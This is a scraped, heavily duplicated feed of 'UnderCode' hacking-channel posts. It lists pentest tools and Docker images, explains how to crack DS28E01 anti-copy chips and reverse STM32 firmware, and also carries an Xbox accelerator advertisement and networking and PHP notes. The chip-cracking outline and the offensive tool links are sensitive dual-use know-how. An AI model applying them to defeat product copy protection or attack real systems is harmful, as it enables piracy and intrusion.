β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
twitter.com/undercodeNews :
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/leebaird/discover /opt/discover/
All scripts must be ran from this location.
2) cd /opt/discover/
3) ./update.sh
API key locations:
recon-ng
show keys
keys add bing_api <value>
theHarvester
/opt/theHarvester/api-keys.yaml
π¦ RECON
1. Domain
2. Person
3. Parse salesforce
π¦ SCANNING
4. Generate target list
5. CIDR
6. List
7. IP, range, or domain
8. Rerun Nmap scripts and MSF aux
π¦WEB
9. Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL
π¦MISC
13. Parse XML
14. Generate a malicious payload
15. Start a Metasploit listener
@UnderCodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
twitter.com/undercodeNews :
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/leebaird/discover /opt/discover/
All scripts must be ran from this location.
2) cd /opt/discover/
3) ./update.sh
API key locations:
recon-ng
show keys
keys add bing_api <value>
theHarvester
/opt/theHarvester/api-keys.yaml
π¦ RECON
1. Domain
2. Person
3. Parse salesforce
π¦ SCANNING
4. Generate target list
5. CIDR
6. List
7. IP, range, or domain
8. Rerun Nmap scripts and MSF aux
π¦WEB
9. Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL
π¦MISC
13. Parse XML
14. Generate a malicious payload
15. Start a Metasploit listener
@UnderCodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 updated A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/codingo/Reconnoitre.git
After you have done this run setup.py with the following:
2) python3 setup.py install
3) After setup has run Reconnoitre will now be in your path (as reconnoitre) and you can launch it anywhere using:
reconnoitre <args>
π¦-h, --help Display help message and exit
-t TARGET_HOSTS Set either a target range of addresses or a single host to target. May also be a file containing hosts.
-o OUTPUT_DIRECTORY Set the target directory where results should be written.
-w WORDLIST Optionally specify your own wordlist to use for pre-compiled commands, or executed attacks.
--pingsweep Write a new target.txt file in the OUTPUT_DIRECTORY by performing a ping sweep and discovering live hosts.
--dns, --dnssweep Find DNS servers from the list of target(s).
--snmp Find hosts responding to SNMP requests from the list of target(s).
--services Perform a service scan over the target(s) and write recommendations for further commands to execute.
--hostnames Attempt to discover target hostnames and write to hostnames.txt.
--virtualhosts Attempt to discover virtual hosts using the specified wordlist. This can be expended via discovered hostnames.
--ignore-http-codes Comma separated list of http codes to ignore with virtual host scans.
--ignore-content-length Ignore content lengths of specificed amount. This may become useful when a server returns a static page on every virtual host guess.
--quiet Supress banner and headers and limit feedback to grepable results.
--quick Move to the next target after performing a quick scan and writing first-round recommendations.
--no-udp Disable UDP service scanning, which is ON by default.
@UnderCodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 updated A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/codingo/Reconnoitre.git
After you have done this run setup.py with the following:
2) python3 setup.py install
3) After setup has run Reconnoitre will now be in your path (as reconnoitre) and you can launch it anywhere using:
reconnoitre <args>
π¦-h, --help Display help message and exit
-t TARGET_HOSTS Set either a target range of addresses or a single host to target. May also be a file containing hosts.
-o OUTPUT_DIRECTORY Set the target directory where results should be written.
-w WORDLIST Optionally specify your own wordlist to use for pre-compiled commands, or executed attacks.
--pingsweep Write a new target.txt file in the OUTPUT_DIRECTORY by performing a ping sweep and discovering live hosts.
--dns, --dnssweep Find DNS servers from the list of target(s).
--snmp Find hosts responding to SNMP requests from the list of target(s).
--services Perform a service scan over the target(s) and write recommendations for further commands to execute.
--hostnames Attempt to discover target hostnames and write to hostnames.txt.
--virtualhosts Attempt to discover virtual hosts using the specified wordlist. This can be expended via discovered hostnames.
--ignore-http-codes Comma separated list of http codes to ignore with virtual host scans.
--ignore-content-length Ignore content lengths of specificed amount. This may become useful when a server returns a static page on every virtual host guess.
--quiet Supress banner and headers and limit feedback to grepable results.
--quick Move to the next target after performing a quick scan and writing first-round recommendations.
--no-udp Disable UDP service scanning, which is ON by default.
@UnderCodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
π¦ ENJOY WITH ALL THOSE 2020 TOOLS - TESTED & Most Populars- Use for Learn..
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ STM32 series BIN file to source code C language by undercode
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) It has always been impossible for all development engineers to convert .BIN or .ASM files into C files. However, from the perspective of the reverse industry of chip decryption, it is completely achievable. However, reverse engineers must have sufficient development experience and sufficient understanding of STM32 series microcontrollers.
2) the binary code BIN file is extracted by chip decryption, and then converted into a C language file. After having the source code, the customer can target Perform secondary development and modification.
3) Usually our operations are, the first step:
> first decrypt, provide the binary code BIN file.
> Step 2: Convert the BIN file into a disassembly file. The assembly file is also a programming file, but few engineers can understand it now.
> Step 3: compiles the C language based on the disassembled file as we do in undercode . This process is edited line by line by the engineer and is also very time consuming. The entire cycle is about 30 days (depending on the file size, normal 100K calculation ).
> Step 4: Debug according to the prototype provided by the customer. After debugging is OK, let the customer confirm.
4) During the entire project development process, customers must provide samples for debugging . After all is completed,
> will generate a BIN face-to-face and burn it into the product for customer testing to ensure that the source code we provide is authentic and reliable. .
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ STM32 series BIN file to source code C language by undercode
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) It has always been impossible for all development engineers to convert .BIN or .ASM files into C files. However, from the perspective of the reverse industry of chip decryption, it is completely achievable. However, reverse engineers must have sufficient development experience and sufficient understanding of STM32 series microcontrollers.
2) the binary code BIN file is extracted by chip decryption, and then converted into a C language file. After having the source code, the customer can target Perform secondary development and modification.
3) Usually our operations are, the first step:
> first decrypt, provide the binary code BIN file.
> Step 2: Convert the BIN file into a disassembly file. The assembly file is also a programming file, but few engineers can understand it now.
> Step 3: compiles the C language based on the disassembled file as we do in undercode . This process is edited line by line by the engineer and is also very time consuming. The entire cycle is about 30 days (depending on the file size, normal 100K calculation ).
> Step 4: Debug according to the prototype provided by the customer. After debugging is OK, let the customer confirm.
4) During the entire project development process, customers must provide samples for debugging . After all is completed,
> will generate a BIN face-to-face and burn it into the product for customer testing to ensure that the source code we provide is authentic and reliable. .
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Detailed DS28E01 typical applications and cracking methods
pinterest.com/undercode_testing
π¦ ππΌππ πππΈβπ :
1) DS28E01 is generally used in encryption protection to prevent products from being easily copied and pirated
2) Brief introduction of DS28E01:
> DS28E01 communicates with the MCU through a single bus. There is not much to say about the single bus. The time is very strict and accurate to the us level.
3) DS28E01 has four memory areas:
Data Memory (EEPROM) (4 pages, 32 bytes per page)
Key memory (secret) (8 bytes)
Register page with specific functions and user bytes
Volatile scratchpad (8 bytes)
4) The MCU can only read and write the scratchpad through a single bus, and cannot directly read and write to other storage areas.
5) When writing data to the data memory, loading the initial key, or writing data to the register page, the data is first written to the scratchpad, and then the corresponding command is used to allow the chip to copy the data from the scratchpad to the destination address.
π¦ working principle:
> There is a SHA-160 encryption module inside the chip, which participates in the SHA algorithm for 55 bytes of specific format data.
> The data contains an 8-byte key, a 5-byte user-specified random number, a 32-byte EEPROM content, a 7-byte ROMID, a 2-byte fixed data (0xFF), and a 1-byte EEPROM address TA1.
> The MCU can read the 20-byte hash value of the chip encrypted by SHA, and compare it with the hash value calculated by the MCU using the same algorithm.
> Since the MCU needs to perform the same encryption operation, or it must definitely generate the same 55-byte message as the chip's internal, how can it be obtained?
> The 8-byte key is generated and written by itself.-> OK
> The 5-byte random number is the value written into the scratchpad before the chip performs the SHA.-> OK
> The 32-byte EEPROM data, before reading back the 20-byte hash value, the chip will return the 32-byte content. -> OK
7-byte ROMID, the ROMID of the chip can@undercodeofficial be read at any time.-> OK
2 bytes fixed value, you can see in the manual-> OK
1 byte TA1, write it in yourself.-> OK
π¦ Typical application process:
Process 1: Initialize the DS28E01 key
The initialization key is only operated at the factory before the product is manufactured, and only needs to be operated once.
Procedure flow chart:
1) Read the chip ROMID
2) Generate a unique 64-bit key through a certain algorithm to ensure that the key generated by each motherboard is different.
3) Write the key to the chip temporary storage area and read it back to verify that it is written correctly
4)Execute the chip load key command to let the chip save the 64-bit key in the temporary storage area to the key storage area
5) Done.
π¦ Process 2: Verify DS28E01 key
1) The verification key is performed in the product application. Every time the product is started, the DS28E01 key is verified to be correct.
2) If it passes the verification, it will run normally. If the verification is incorrect, it will make the product work abnormally by some means.
π¦ Procedure flow chart:
1) Read the chip ROMID
2) Generate the 64-bit key through the same algorithm as in the initialization process
3) Write 8-byte random number to the chip temporary storage area (only 5 bytes are used), and read back to verify
4) Send a cryptographic authentication command to the chip, which can read back 32 bytes of EEPROM data and 20 bytes of hash value
5) Use the data read above to generate a 55-byte digest message and perform the SHA1 operation
6) Compare the hash value calculated by yourself with the hash value read back from the chip
π¦Cracking method:
From the above application process, we can see that the key algorithm here is SHA1, and there are two copies of the data participating in the SHA calculation. One is inside the chip, and we cannot read it
π¦ Detailed DS28E01 typical applications and cracking methods
pinterest.com/undercode_testing
π¦ ππΌππ πππΈβπ :
1) DS28E01 is generally used in encryption protection to prevent products from being easily copied and pirated
2) Brief introduction of DS28E01:
> DS28E01 communicates with the MCU through a single bus. There is not much to say about the single bus. The time is very strict and accurate to the us level.
3) DS28E01 has four memory areas:
Data Memory (EEPROM) (4 pages, 32 bytes per page)
Key memory (secret) (8 bytes)
Register page with specific functions and user bytes
Volatile scratchpad (8 bytes)
4) The MCU can only read and write the scratchpad through a single bus, and cannot directly read and write to other storage areas.
5) When writing data to the data memory, loading the initial key, or writing data to the register page, the data is first written to the scratchpad, and then the corresponding command is used to allow the chip to copy the data from the scratchpad to the destination address.
π¦ working principle:
> There is a SHA-160 encryption module inside the chip, which participates in the SHA algorithm for 55 bytes of specific format data.
> The data contains an 8-byte key, a 5-byte user-specified random number, a 32-byte EEPROM content, a 7-byte ROMID, a 2-byte fixed data (0xFF), and a 1-byte EEPROM address TA1.
> The MCU can read the 20-byte hash value of the chip encrypted by SHA, and compare it with the hash value calculated by the MCU using the same algorithm.
> Since the MCU needs to perform the same encryption operation, or it must definitely generate the same 55-byte message as the chip's internal, how can it be obtained?
> The 8-byte key is generated and written by itself.-> OK
> The 5-byte random number is the value written into the scratchpad before the chip performs the SHA.-> OK
> The 32-byte EEPROM data, before reading back the 20-byte hash value, the chip will return the 32-byte content. -> OK
7-byte ROMID, the ROMID of the chip can@undercodeofficial be read at any time.-> OK
2 bytes fixed value, you can see in the manual-> OK
1 byte TA1, write it in yourself.-> OK
π¦ Typical application process:
Process 1: Initialize the DS28E01 key
The initialization key is only operated at the factory before the product is manufactured, and only needs to be operated once.
Procedure flow chart:
1) Read the chip ROMID
2) Generate a unique 64-bit key through a certain algorithm to ensure that the key generated by each motherboard is different.
3) Write the key to the chip temporary storage area and read it back to verify that it is written correctly
4)Execute the chip load key command to let the chip save the 64-bit key in the temporary storage area to the key storage area
5) Done.
π¦ Process 2: Verify DS28E01 key
1) The verification key is performed in the product application. Every time the product is started, the DS28E01 key is verified to be correct.
2) If it passes the verification, it will run normally. If the verification is incorrect, it will make the product work abnormally by some means.
π¦ Procedure flow chart:
1) Read the chip ROMID
2) Generate the 64-bit key through the same algorithm as in the initialization process
3) Write 8-byte random number to the chip temporary storage area (only 5 bytes are used), and read back to verify
4) Send a cryptographic authentication command to the chip, which can read back 32 bytes of EEPROM data and 20 bytes of hash value
5) Use the data read above to generate a 55-byte digest message and perform the SHA1 operation
6) Compare the hash value calculated by yourself with the hash value read back from the chip
π¦Cracking method:
From the above application process, we can see that the key algorithm here is SHA1, and there are two copies of the data participating in the SHA calculation. One is inside the chip, and we cannot read it
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
However, the other copy is generated inside the MCU, so as long as the process of generating messages inside the MCU is obtained, there is a possibility of cracking.
The key data is an 8-byte key, because the 8-byte key is generally bound to the ROMID and CPUID.
Therefore, the binary code of the program must be able to be read from the chip, and then the algorithm for key generation must be disassembled and analyzed to achieve the purpose of cracking.
However, disassembling and analyzing the algorithm is not easy.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
The key data is an 8-byte key, because the 8-byte key is generally bound to the ROMID and CPUID.
Therefore, the binary code of the program must be able to be read from the chip, and then the algorithm for key generation must be disassembled and analyzed to achieve the purpose of cracking.
However, disassembling and analyzing the algorithm is not easy.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Last Two tutorial for hackers with little bit experience :)
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ BEST Docker images + tools i fond at git random link -MOst popular hack tools :
for Penetration Testing LASTEST :
fb.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
docker pull kalilinux/kali-linux-docker official Kali Linux
>https://hub.docker.com/r/kalilinux/kali-linux-docker/
docker pull owasp/zap2docker-stable - official OWASP ZAP
>https://github.com/zaproxy/zaproxy
docker pull wpscanteam/wpscan - official WPScan
> https://hub.docker.com/r/wpscanteam/wpscan/
docker pull pandrew/metasploit - docker-metasploit
> https://hub.docker.com/r/citizenstig/dvwa/
docker pull citizenstig/dvwa - Damn Vulnerable Web Application (DVWA)
> https://hub.docker.com/r/citizenstig/dvwa/
docker pull wpscanteam/vulnerablewordpress - Vulnerable WordPress
Installation
>https://hub.docker.com/r/wpscanteam/vulnerablewordpress/
docker pull hmlio/vaas-cve-2014-6271 - Vulnerability as a service: Shellshock
> https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/
docker pull hmlio/vaas-cve-2014-0160 - Vulnerability as a service: Heartbleed
>https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/
docker pull opendns/security-ninjas - Security Ninjas
> https://hub.docker.com/r/opendns/security-ninjas/
>http://www.xss-payloads.com/ XSS Payloads to leverage XSS vulnerabilities, build custom payloads, practice penetration testing skills.
https://github.com/joaomatosf/jexboss JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
https://github.com/commixproject/commix Automated All-in-One OS command injection and exploitation tool
https://github.com/pathetiq/BurpSmartBuster A Burp Suite content discovery plugin that add the smart into the Buster!
https://github.com/GoSecure/csp-auditor Burp and ZAP plugin to analyze CSP headers
https://github.com/ffleming/timing_attack Perform timing attacks against web applications
https://github.com/lalithr95/fuzzapi Fuzzapi is a tool used for REST API pentesting
https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)
https://github.com/nccgroup/wssip Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
https://github.com/tijme/angularjs-csti-scanner Automated client-side template injection (sandbox escape/bypass) detection for AngularJS (ACSTIS).
https://reshift.softwaresecured.com A source code analysis tool for detecting and managing Java security vulnerabilities.
https://encoding.tools Web app for transforming binary data and strings, including hashes and various encodings. GPLv3 offline version available.
https://gchq.github.io/CyberChef/ A "Cyber Swiss Army Knife" for carrying out various encodings and transformations of binary data and strings.
https://github.com/urbanadventurer/WhatWeb WhatWeb - Next generation web scanner
https://www.shodan.io/ Shodan - The search engine for find vulnerable servers
https://github.com/WangYihang/Webshell-Sniper A webshell manager via terminal
@UnderCodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ BEST Docker images + tools i fond at git random link -MOst popular hack tools :
for Penetration Testing LASTEST :
fb.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
docker pull kalilinux/kali-linux-docker official Kali Linux
>https://hub.docker.com/r/kalilinux/kali-linux-docker/
docker pull owasp/zap2docker-stable - official OWASP ZAP
>https://github.com/zaproxy/zaproxy
docker pull wpscanteam/wpscan - official WPScan
> https://hub.docker.com/r/wpscanteam/wpscan/
docker pull pandrew/metasploit - docker-metasploit
> https://hub.docker.com/r/citizenstig/dvwa/
docker pull citizenstig/dvwa - Damn Vulnerable Web Application (DVWA)
> https://hub.docker.com/r/citizenstig/dvwa/
docker pull wpscanteam/vulnerablewordpress - Vulnerable WordPress
Installation
>https://hub.docker.com/r/wpscanteam/vulnerablewordpress/
docker pull hmlio/vaas-cve-2014-6271 - Vulnerability as a service: Shellshock
> https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/
docker pull hmlio/vaas-cve-2014-0160 - Vulnerability as a service: Heartbleed
>https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/
docker pull opendns/security-ninjas - Security Ninjas
> https://hub.docker.com/r/opendns/security-ninjas/
>http://www.xss-payloads.com/ XSS Payloads to leverage XSS vulnerabilities, build custom payloads, practice penetration testing skills.
https://github.com/joaomatosf/jexboss JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
https://github.com/commixproject/commix Automated All-in-One OS command injection and exploitation tool
https://github.com/pathetiq/BurpSmartBuster A Burp Suite content discovery plugin that add the smart into the Buster!
https://github.com/GoSecure/csp-auditor Burp and ZAP plugin to analyze CSP headers
https://github.com/ffleming/timing_attack Perform timing attacks against web applications
https://github.com/lalithr95/fuzzapi Fuzzapi is a tool used for REST API pentesting
https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)
https://github.com/nccgroup/wssip Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
https://github.com/tijme/angularjs-csti-scanner Automated client-side template injection (sandbox escape/bypass) detection for AngularJS (ACSTIS).
https://reshift.softwaresecured.com A source code analysis tool for detecting and managing Java security vulnerabilities.
https://encoding.tools Web app for transforming binary data and strings, including hashes and various encodings. GPLv3 offline version available.
https://gchq.github.io/CyberChef/ A "Cyber Swiss Army Knife" for carrying out various encodings and transformations of binary data and strings.
https://github.com/urbanadventurer/WhatWeb WhatWeb - Next generation web scanner
https://www.shodan.io/ Shodan - The search engine for find vulnerable servers
https://github.com/WangYihang/Webshell-Sniper A webshell manager via terminal
@UnderCodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 97 likes Β· 3 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1 ) Over the past year, the number of console players has grown rapidly, and the number of Xbox console players, which is one of the three major consoles, has naturally increased significantly, reaching a level that can compete with the Sony PS4.
> Although XBOX no longer announces sales for reasons of paying more attention to player participation, but from the online feedback of games such as Halo 5, Battle Machine 4, and so on, the number of Xbox users is considerable, and in addition to the number, online feedback has another noteworthy The thing is that the Xbox online network is very unstable.
2) The Xbox online network is very unstable, which is mainly reflected in the high delay, character transient, packet loss, and ping, etc. It is necessary to wait for a long time before entering the game or game, causing players a headache. This environment is also forcing players to think about the need for Xbox Accelerators.
3) The Xbox Accelerator can improve the method of game data transmission! Improve the network manifestation in the Xbox game history. A good Xbox Accelerator can make the player's network appear very different, no longer subject the player to the game being unable to connect and disconnect And match the environment with long waiting times.
4) The first full-platform intelligent acceleration hardware-Dolphin Acceleration Box! It is well reflected in the Xbox console acceleration. Players can enjoy Dolphin Acceleration after holding a brief setting! The box improves the results under the HTSA intelligent acceleration strategy and experiences Differences before and after gaming network
5) The Dolphin Acceleration Box breaks through the limitation of NAT types, improves the P2P teaming experience, and uses intelligent acceleration methods to ensure that the network in the game history shows a stable and smooth state of connectivity. It is an Xbox accelerator you are worth buying.
6) Which Xbox accelerator is better, Dolphin Accelerator is your first choice. Dolphin acceleration box, plug and play to solve the poor NAT type in Xbox games. P2P matching speed is too slow and delays, etc., so that your Xbox game network steadily rises and enjoys a high-quality network.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1 ) Over the past year, the number of console players has grown rapidly, and the number of Xbox console players, which is one of the three major consoles, has naturally increased significantly, reaching a level that can compete with the Sony PS4.
> Although XBOX no longer announces sales for reasons of paying more attention to player participation, but from the online feedback of games such as Halo 5, Battle Machine 4, and so on, the number of Xbox users is considerable, and in addition to the number, online feedback has another noteworthy The thing is that the Xbox online network is very unstable.
2) The Xbox online network is very unstable, which is mainly reflected in the high delay, character transient, packet loss, and ping, etc. It is necessary to wait for a long time before entering the game or game, causing players a headache. This environment is also forcing players to think about the need for Xbox Accelerators.
3) The Xbox Accelerator can improve the method of game data transmission! Improve the network manifestation in the Xbox game history. A good Xbox Accelerator can make the player's network appear very different, no longer subject the player to the game being unable to connect and disconnect And match the environment with long waiting times.
4) The first full-platform intelligent acceleration hardware-Dolphin Acceleration Box! It is well reflected in the Xbox console acceleration. Players can enjoy Dolphin Acceleration after holding a brief setting! The box improves the results under the HTSA intelligent acceleration strategy and experiences Differences before and after gaming network
5) The Dolphin Acceleration Box breaks through the limitation of NAT types, improves the P2P teaming experience, and uses intelligent acceleration methods to ensure that the network in the game history shows a stable and smooth state of connectivity. It is an Xbox accelerator you are worth buying.
6) Which Xbox accelerator is better, Dolphin Accelerator is your first choice. Dolphin acceleration box, plug and play to solve the poor NAT type in Xbox games. P2P matching speed is too slow and delays, etc., so that your Xbox game network steadily rises and enjoys a high-quality network.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LAST 24 sended tutorials :
1) 2020 optimize script, performance monitor system- speed up android...
2) 2020 TOPIC Flutter makes it easy and fast to build beautiful mobile apps + pic
3) 2020 updated Hatch is a brute force tool that is used to brute force most websites
4) 2020 Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
5) 2020 updated A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
6) STM32 series BIN file to source code C language by undercode
+ Leak & EXPLOITE pdf tutorial
7) Detailed DS28E01 typical applications and cracking methods
8) Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode
ENJOY MORE FOR LATER !@UNDERCODETESTING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LAST 24 sended tutorials :
1) 2020 optimize script, performance monitor system- speed up android...
2) 2020 TOPIC Flutter makes it easy and fast to build beautiful mobile apps + pic
3) 2020 updated Hatch is a brute force tool that is used to brute force most websites
4) 2020 Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
5) 2020 updated A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
6) STM32 series BIN file to source code C language by undercode
+ Leak & EXPLOITE pdf tutorial
7) Detailed DS28E01 typical applications and cracking methods
8) Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode
ENJOY MORE FOR LATER !@UNDERCODETESTING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Fix Commun error: Network Configuration-Deny Secondary Agent full by undercode :
fb.com/undercodeOfficial
π¦ ππΌππ πππΈβπ :
1) Because a legitimate IP (MAC and IP has been bound on Linux) was installed as a gateway, MASQUERADE allows all other users to masquerade as this legitimate IP through it, causing anyone to point the gateway It can go out.
> For example: The gateway of 192.168.1.168 (00: 01: 02: 49: 19: 85) points to 192.168.1.254 and can go out. Now two networks are installed on 192.168.1.168, eth0: 192.168.1.168, eth1: 10.136.14.254, configured as a NAT using MASQUERADE, so all 10.136.14.0/24 can be disguised as 192.168.1.168 and go out through 192.168.1.254 .
2) How to identify this situation and reject it or block the IP for one hour. DROP of ETH1 FORWARD to EXT-IP Thank you gentoo, but it seems that this is not the best solution. I understand, but you do nβt know clearly (maybe it βs a problem of my understanding ability), it βs convenient to make it clear!
3) This is a recent problem that occurred in our school. IP addresses used by professionals, this network segment can be MASQUERADE on the Internet through S, all IPs on this network segment are bound in / etc / ethers in GateWay S, excluding the possibility of others changing the IP (Of course, you can change the MAC address, this does not care about him). 10.136.14.0/24 This network segment is used by all ordinary students. The problem now is that some individual computer majors add a new network card to their computer, and then set up a Linux, and use MASQUERADE to pretend to be 192.168.1 for everyone on the 10.136.14.0/24 network segment.
4) X goes on the internet. As a result, many students often do things they shouldn't. So in response to this new situation, would you like to ask if you can refuse such a situation? Or have related commercial software.
5) Adding a network card yourself belongs to the category of physical attacks, and it is theoretically impossible to eliminate this situation. It is also useless to divide VLANs. The solution in our school is to rivet all the cases with rivets.
6) Only a few people have the right to open the case and then divide the VLAN, which works well. The IP of the network segment 192.168.1.0 is bound to the mac. The student uses the IP of the network segment 10.136.14.0/24.
7) How can the student obtain the IP of the network segment of 192.168.1.0? Students can't get the IP of 192.16.8.1.0 on this network segment, can't it be disguised? It is 192.168.1.0/24 that an IP owner set up a Linux, and then use MASQUERADE to disguise all 10.136.14.0/24 people as 192.168.1.X, so that 10.136.14.0/24 can go out Yeah. Theoretically, to prevent this situation, you need to be able to identify whether the packet is from the real 192.168.1.X or has been spoofed. But this seems to be more difficult, you need someone who can come up with a good idea
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Fix Commun error: Network Configuration-Deny Secondary Agent full by undercode :
fb.com/undercodeOfficial
π¦ ππΌππ πππΈβπ :
1) Because a legitimate IP (MAC and IP has been bound on Linux) was installed as a gateway, MASQUERADE allows all other users to masquerade as this legitimate IP through it, causing anyone to point the gateway It can go out.
> For example: The gateway of 192.168.1.168 (00: 01: 02: 49: 19: 85) points to 192.168.1.254 and can go out. Now two networks are installed on 192.168.1.168, eth0: 192.168.1.168, eth1: 10.136.14.254, configured as a NAT using MASQUERADE, so all 10.136.14.0/24 can be disguised as 192.168.1.168 and go out through 192.168.1.254 .
2) How to identify this situation and reject it or block the IP for one hour. DROP of ETH1 FORWARD to EXT-IP Thank you gentoo, but it seems that this is not the best solution. I understand, but you do nβt know clearly (maybe it βs a problem of my understanding ability), it βs convenient to make it clear!
3) This is a recent problem that occurred in our school. IP addresses used by professionals, this network segment can be MASQUERADE on the Internet through S, all IPs on this network segment are bound in / etc / ethers in GateWay S, excluding the possibility of others changing the IP (Of course, you can change the MAC address, this does not care about him). 10.136.14.0/24 This network segment is used by all ordinary students. The problem now is that some individual computer majors add a new network card to their computer, and then set up a Linux, and use MASQUERADE to pretend to be 192.168.1 for everyone on the 10.136.14.0/24 network segment.
4) X goes on the internet. As a result, many students often do things they shouldn't. So in response to this new situation, would you like to ask if you can refuse such a situation? Or have related commercial software.
5) Adding a network card yourself belongs to the category of physical attacks, and it is theoretically impossible to eliminate this situation. It is also useless to divide VLANs. The solution in our school is to rivet all the cases with rivets.
6) Only a few people have the right to open the case and then divide the VLAN, which works well. The IP of the network segment 192.168.1.0 is bound to the mac. The student uses the IP of the network segment 10.136.14.0/24.
7) How can the student obtain the IP of the network segment of 192.168.1.0? Students can't get the IP of 192.16.8.1.0 on this network segment, can't it be disguised? It is 192.168.1.0/24 that an IP owner set up a Linux, and then use MASQUERADE to disguise all 10.136.14.0/24 people as 192.168.1.X, so that 10.136.14.0/24 can go out Yeah. Theoretically, to prevent this situation, you need to be able to identify whether the packet is from the real 192.168.1.X or has been spoofed. But this seems to be more difficult, you need someone who can come up with a good idea
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Install PHP as Apache DSOPHP full by undercode
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Install PHP as Apache DSOPHP is often used with the Apache Web server for Linux / Unix platforms. When we install PHP in the Apache environment, you have three installation modes to choose from: static modules, dynamic modules (DSO), and CGI.
2) I suggest you install PHP as Apached's DSO. This installation mode is very easy to maintain and upgrade. For example, suppose you originally installed only database support for PHP. But after a few days you decided to add encryption to PHP. Quite simply, you just need to type the make clean command, add new configuration options, and then execute the make and make install commands.
3) In this way, the new PHP module will be installed in the appropriate location on Apache, you just restart Apache and everything is OK, of course, the entire process does not need to recompile Apache at all.
4) The simple steps to install a new version of Apache and PHP as an
π¦ Apache DSO are as follows:
1) Download the latest version of the source code for the Apache server software from the Apache Software Foundation site.
2) Place the code files in a suitable directory such as / usr / local / or / opt /.
3) Use the Gunzip command to decompress the code file, then you can get the corresponding * .tar file.
4) Type the following unpacking command to place the above tar file in a directory of the form apache_ [version]:
tar -xvf apache_ [version] .tar
